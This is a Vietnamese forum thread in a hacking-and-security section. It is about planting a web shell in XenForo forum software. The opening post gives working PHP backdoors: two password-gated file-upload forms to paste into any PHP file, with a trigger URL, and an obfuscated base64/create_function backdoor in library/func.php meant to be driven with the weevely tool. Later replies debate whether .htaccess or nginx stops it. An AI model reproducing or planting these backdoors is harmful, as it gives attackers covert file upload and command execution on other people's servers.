1. Xác thực tài khoản để có thể sử dụng đầy đủ chức năng của diễn đàn. Xem hướng dẫn
    Dismiss Notice

Include shell vào source xenforo

Thảo luận trong 'Hacking - Security' bắt đầu bởi sanvu88, 15/2/14.

1votes
5/5, 1 vote

  1. sanvu88

    sanvu88 Well-Known Member

    Bài viết:
    1,048
    Likes :
    467
    Cách 1:

    Tìm 1 file php bất kỳ, file nào cũng được chèn vào dưới <?php đoạn code sau

    Mã:
    if(@$_REQUEST["sanvu88"]== 'sanvu88'){
                $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');}
    Hoặc

    Mã:
    if($_GET['sanvu88']=='sanvu88')
    {
    echo '<form method="POST" enctype="multipart/form-data" action="?sanvu88=sanvu88">
    <input type="file" name="file_upload" size="20" id="file">
    <input type="submit" name="gui" value="Up" >
    </form>';if (isset($_POST['gui'])){
    move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
    }
    }
    Cách run

    ví dụ ta chèn vào file index.php thì run như sau

    http://domain.com/index.php?sanvu88=sanvu88

    Kết quả ta được 1 form upload và làm gì với nó là tùy các bạn thôi

    sshot-1

    2. Backdoors

    Tạo 1 file php. Ví dụ mình tạo file func.php trong thư mục library với nội dung

    Mã:
    <?php
    $vdn = str_replace("tw","","stwttwr_twretwpltwactwe");
    $hh="mksIGumpvaumW4umoYXJyYXlumfc2xpumY2UoJumGEsJGMoJGEpLTMpKSumkpumKTtlY2hvICc8LycuJGsuJz4nO3um0=";
    $rft="0X2RlY29kZSumhwcmVnXum3JlcGxhY2UoYumXJyYXkoumJy9bXlumx3PVxzXS8nLCcvXHMvJyksumIGFycmF5KCcnLCcrJyu";
    $aec="JGM9J2NvdumW50JzskYTum0kX0NPT0umtJRTtpZiumhyZXNldCgkYSumk9PSumc2NScgJiYgJumGMoJumGEpPjMpe2luaV9zumZ";
    $wmh="umXQoJ2Vycm9yX2xvZycsICcvZGV2L25um1bGwnKTumskaz0numNDumMyMumSc7ZumWNobyAnPCcuJGsuJz4nO2V2YWwoYmFzZTY";
    $pre = $vdn("ov", "", "ovbaovsoveov64_doveovcovoovdove");
    $hkc = $vdn("an","","ancanraneatane_fuanncantioann");
    $hc = $hkc('', $pre($vdn("um", "", $aec.$wmh.$rft.$hh))); $hc();
    ?>
    Cách run. Cái này phải dụng backtrack để kết nối :)
    Tool weevely của backtrack
    Các bạn cũng có thể dùng backtrack để tạo code backdoor cho riêng mình nhé :) code ở trên chỉ là ví dụ và đã đặt pass mình chỉ đưa ra làm ví dụ thôi :)
    Với backdoor dạng này thì có thể kết nối tới server và run các lệnh local bình thường nếu server cho phép.

    Done. Chúc vui.
     
    Last edited: 15/2/14
    Đang tải...
  2. VXF

    VXF Be like no other .. Staff Member

    Bài viết:
    1,275
    Likes :
    2,149
    Tất cả các cách mà bạn đề cập XenForo đã chặn hết rồi @sanvu88 nhé. Do đó việc include backdoor vào XenForo rất khó có thể thực hiện được.
     
  3. sanvu88

    sanvu88 Well-Known Member

    Bài viết:
    1,048
    Likes :
    467
    2 cách trên thì có thể chặn nhưng cách 2 là do server liên quan gì đến code đâu nhỉ :)
     
  4. VXF

    VXF Be like no other .. Staff Member

    Bài viết:
    1,275
    Likes :
    2,149
    Bạn nói:
    Trong thư mục library có htaccess chặn ko cho phép bất kỳ truy cập nào từ bên ngoài vào các file php ở library bạn nhé => cách của bạn ko chạy được đâu.
     
    nguyendungbkc thích bài này.
  5. stano1

    stano1 New Member

    Bài viết:
    3
    Likes :
    0
    Mình đọc title tưởng upload backdoor hoặc upload shell lên sv đang chạy, chứ chèn vào source có sẵn thì không khó đâu Alucar
     
  6. VXF

    VXF Be like no other .. Staff Member

    Bài viết:
    1,275
    Likes :
    2,149
    @stano1 Đúng là ko khó nhưng ở đây mình nói theo cách mà @sanvu88 hướng dẫn
     
    stano1 thích bài này.
  7. sanvu88

    sanvu88 Well-Known Member

    Bài viết:
    1,048
    Likes :
    467
    Đâu nhất thiêt chèn trong thư mục library đâu @@ hơn nữa đâu phải ai cũng xài apache để cái htaccess đó có tác dụng =="
    trường hợp dùng nginx thì htaccess đâu có tác dụng gì :|
     
  8. VXF

    VXF Be like no other .. Staff Member

    Bài viết:
    1,275
    Likes :
    2,149
    @sanvu88 vì trong hướng dẫn bạn để là chèn vào library nên mình trả lời vậy :D
    Kể cả khi bạn sài nginx hay bất kỳ webserver cũng ko được nhé.

    Ở đây mình ko muốn public cách chèn shell vì lợi ít hại nhiều. Còn vẫn có cách chèn shell vào XenForo bạn nhé.
     
  9. sanvu88

    sanvu88 Well-Known Member

    Bài viết:
    1,048
    Likes :
    467
    đã nói là ví dụ thôi mà :)) còn những cái pub ra thì tất nhiên là chả ai dại gì mà pub hết vốn liếng của mình cả :x
     
  10. soncuti

    soncuti Member

    Bài viết:
    448
    Likes :
    174
    câu hỏi đơn giản là : tại sao bạn thêm code vào file trên host đc , mà host đó không fai của bạn :D
    làm đc điều đó đi thì hãy run shell
     
  11. Hostvn.net

    Hostvn.net New Member

    Bài viết:
    7
    Likes :
    2
    Chưa thấy bạn nào thử thành công trên server bên mình theo 2 cách bạn chủ bài viết nêu ra cả. :(
     
  12. nguyendungbkc

    nguyendungbkc Verified User

    Bài viết:
    180
    Likes :
    91
    chủ đề nay rất hay, các pro bình luận càng "chân thành" thì các newbie như mình học hỏi càng nhiều về bảo mật và quan trị xenforo. Mong có nhiều chủ đề như thế này
     
comments powered by Disqus

Chia sẻ trang này

Đang tải...